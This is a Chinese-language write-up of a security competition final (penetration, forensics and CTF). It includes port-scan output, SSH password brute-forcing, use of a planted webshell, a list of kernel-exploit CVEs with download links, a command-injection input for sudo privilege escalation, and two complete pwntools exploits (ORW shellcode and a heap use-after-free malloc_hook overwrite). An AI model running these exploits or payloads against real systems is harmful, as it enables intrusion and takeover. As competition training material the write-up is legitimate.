第一届长城杯信息安全铁人三项赛总决赛 WriteUp

也许会是一种成长

80多个队，最后只打了60名，拿了个保底的三等奖，大家都好强，自己的跟他们差距似乎还是很大

赛前准备了很多，结果还是没用上，赛题出的都挺不错的，分为渗透、溯源取证（其实就是流量分析和连上靶机排查），ctf

自己主要负责渗透，随便帮队友看看溯源取证，本来以为取证是类似取证比赛的题型想着能有点把握，其实并不是

赛后反思了一下自己，在8小时的时间里，其实有些题自己还是能出的，就是少了几分坚持，碰上自己不拿手的部分不愿意去死磕，希望下次可以表现好点

企业环境渗透

本机ip

192.168.177.12

靶机ip

202.0.7.200
202.0.7.201
202.0.7.199

202.0.7.199

.\fscan64.exe -h 202.0.7.199 -p 1-65535

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 202.0.7.199 is alive
[*] Icmp alive hosts len is: 1
202.0.7.199:22 open
202.0.7.199:80 open
202.0.7.199:8080 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://202.0.7.199 code:200 len:1428 title:Photo Site |
Index
[*] WebTitle: http://202.0.7.199:8080 code:200 len:713 title:T3 GAMES
已完成 2/3 [-] ssh 202.0.7.199:22 root root@123 ssh: handshake failed: ssh: unable
to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 202.0.7.199:22 root 666666 ssh: handshake failed: ssh: unable
to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 202.0.7.199:22 root Aa123123 ssh: handshake failed: ssh: unable
to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 202.0.7.199:22 admin 123 ssh: handshake failed: ssh: unable to
authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 202.0.7.199:22 admin test123 ssh: handshake failed: ssh: unable
to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 202.0.7.199:22 admin a123456 ssh: handshake failed: ssh: unable
to authenticate, attempted methods [none password], no supported methods remain
已完成 3/3
[*] 扫描结束,耗时: 10m46.0372215s

扫描路径

在202.0.7.199/dashboard.html找到flag2

在/uploads目录发现分别有shell.php和shell.txt，查看shell.txt推测其内容和shell.php语言

经测试发现该木马可用

蚁剑连接，分别翻到flag1、flag3、flag4

在/home/athena/password-reminder.txt 看到

推测其ssh密码，生成字典，然后爆破

athena
password76

爆破成功，读取flag

查看网段

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
group default qlen 1000
link/ether fa:16:3e:2a:0a:97 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.2/24 brd 10.10.10.255 scope global ens3
valid_lft forever preferred_lft forever
inet6 fe80::f816:3eff:fe2a:a97/64 scope link
valid_lft forever preferred_lft forever

扫网段没啥新发现

之后尝试提权，suid，内核都没成功

[+] [CVE-2019-13272] PTRACE_TRACEME
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
Exposure: highly probable
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-
*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*}
],fedora=30{kernel:5.0.9-*}
Download URL: https://gitlab.com/exploit-database/exploitdb-binsploits/-/
raw/main/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-
2019-13272/poc.c
Comments: Requires an active PolKit agent.
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heapbased-
overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heapbased-
overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-
22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/securityresearch/
master/pocs/linux/cve-2021-22555/exploit.c

赛后看其他师傅的wp发现是那个/home/team-tasks目录下看起来很奇怪的cookie-gen.py，正常环境下不可能出现的东西，来提权的

sudo /usr/bin/python /home/team-tasks/cookie-gen.py

运行后输入想执行的命令，例如

1;cat /root/fl*||

在输入1就能输出cat读取的内容也就是flag了

202.0.7.200

一道挺难的pwn题，队里的pwn✌没打通

.\fscan64.exe -h 202.0.7.200 -p 1-65535

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 202.0.7.200 is alive
[*] Icmp alive hosts len is: 1
202.0.7.200:22 open
202.0.7.200:8888 open
202.0.7.200:8899 open
[*] alive ports len is: 3
start vulscan
已完成 0/3 [-] webtitle http://202.0.7.200:8888 Get "http://202.0.7.200:8888":
net/http: HTTP/1.x transport connection broken: malformed HTTP status code "/"
[*] WebTitle: http://202.0.7.200:8899 code:200 len:658 title:内测页面

202.0.7.201

python dirsearch.py -u http://202.0.7.201/

下载下来/index.html的那个excel文件，打开发现flag

后面当时没做出来，代码审计能力还有待提高，其实就是通过目录穿越绕过文件上传shell

之后msf内核提权一把梭就可以了

取证溯源

1.流量包找到攻击ip

反弹shell找到另一ip

2.解包反编译apk文件发现密码

3.流量包中看到pic.jpg 返回值是权限不足

4.审流量得到api接口

5.服务器内发现webshell位置

8.后门得到的权限只能是tomcat

9.cat /etc/*-release 得到版本信息

10.秘密文件就在webshell位置旁边

12.13.蒙的

14.

夺旗闯关

SandBoxShell

ret2shellcode

使用orw手法读出flag即可

from pwn import*
context(log_level = 'debug', arch = 'amd64', os = 'linux')
p=remote('202.0.5.192',8888)
#p=process('./SandBoxShell')
#gdb.attach(p)
shellcode=shellcraft.open('./flag')+shellcraft.read('rax','rsp',0x100)+shellcraf
t.write(1,'rsp',0x100)
payload1=asm(shellcode)

p.sendline(payload1)

p.interactive()

Old_man_v1

dele函数处，free后未置空指针，存在uaf
先利用uaf释放到unsortedbin，泄露地址
然后通过申请0x70大小堆块切割unsortedbin中的chunk，再释放，使用之前未置空的unsortedbin指针
完成堆溢出，在tecachebin中伪造一个fakechunk来劫持malloc_hook为onegadget，完成getshell

from pwn import *
context.log_level='debug'
r = process("./Old_man_v1")
r = remote('202.0.5.192',9999)
#libc = ELF("/home/xyan/tools/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc-
2.27.so")
#gdb.attach(r)
libc = ELF("./libc-2.27.so")
def add(index,size,content):
    r.recvuntil("4:This old man's case is no longer needed")
    r.sendline(b'1')
    r.recvuntil("Which elderly case do you need to add?")
    r.sendline(str(index))
    r.recvuntil("How much content does this elderly person's case need to include?:")
    r.sendline(str(size))
    r.recvuntil("So what are you going to write about:")
    r.sendline(content)
    
def delete(index):
    r.recvuntil("4:This old man's case is no longer needed")
    r.sendline(b'4')
    r.recvuntil("Which elderly case do you want to delete?")
    r.sendline(str(index))
    
def edit(index,data):
    r.recvuntil("4:This old man's case is no longer needed")
    r.sendline(b'3')
    r.recvuntil("Which elderly case do you want to edit?")
    r.sendline(str(index))
    r.recvuntil("So what are you going to write about:")
    r.sendline(data)
    
def show(index):
    r.recvuntil("4:This old man's case is no longer needed")
    r.sendline(b'2')
    r.recvuntil("Which elderly case do you want to show?")
    r.sendline(str(index))
    
#libc_base = 0x7ffff7a62970 - libc_puts
#log.success("libc_base addr is -> %s" %hex(libc_base))
one1 = 0x4f2a5
one2 = 0x4f302
one3 = 0x10a2fc


add(0,0x420,"a")
add(1,0x420,"a")
delete(0)

show(0)

main_area_96 = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
log.success("main_area is ---> %s" %hex(main_area_96))
malloc_hook = main_area_96 -112
libc_base = malloc_hook - libc.symbols['__malloc_hook']
one_gadget = libc_base + one3
log.success("one_gadget is ---> %s" %hex(one_gadget))
fake_chunk = main_area_96 - 96 -0x33
log.success("fake_chunk is ---> %s" %hex(fake_chunk))
add(2,0x70,"a")
add(3,0x70,"a")
delete(2)
delete(3)
payload = b"\x00"*0x70+p64(0x81)+(p64(fake_chunk+0x10)*2)
#
edit(0,payload)
add(4,0x70,"a")
add(5,0x70,b'a'*0x13+ p64(one_gadget))
#gdb.attach(r)
r.recvuntil("4:This old man's case is no longer needed")
r.sendline(b'1')
r.recvuntil("Which elderly case do you need to add?")
r.sendline(str(6))
r.recvuntil("How much content does this elderly person's case need to
include?:")
r.sendline(str(0x20))

r.interactive()